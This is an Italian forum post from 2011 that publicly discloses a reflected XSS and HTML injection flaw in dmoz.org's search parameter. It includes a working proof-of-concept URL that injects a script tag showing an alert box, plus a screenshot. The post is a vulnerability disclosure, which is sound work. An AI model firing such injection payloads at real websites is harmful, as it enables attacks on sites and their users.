Il Forum di Orebla.it
http://www.orebla.it/forum/

[XSS] dmoz.org
http://www.orebla.it/forum/bug-siti-web-f31/xss-dmoz-t889.html
Pagina 1 di 1

Autore:  orebla [ mer 05 gen, 2011 1:22 pm ]
Oggetto del messaggio:  [XSS] dmoz.org

Un bel XSS, HTML Injection nella più famosa Open Directory!

La variabile search non è minimamente validata. Vabbè che il sito non ha log-in o dati sensibili da rubare. Però un minimo di sicurezza...

URL: http://www.dmoz.org/search?q=prova%3Cscript%3Ealert('XSS');%3C/script%3E&cat=all&all=no

IMG:
Allegato:
Commento file: Dmoz.org XSS
dmoz xss.JPG
dmoz xss.JPG [ 60.6 KiB | Osservato 2078 volte ]

Pagina 1 di 1 Tutti gli orari sono UTC + 1 ora
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/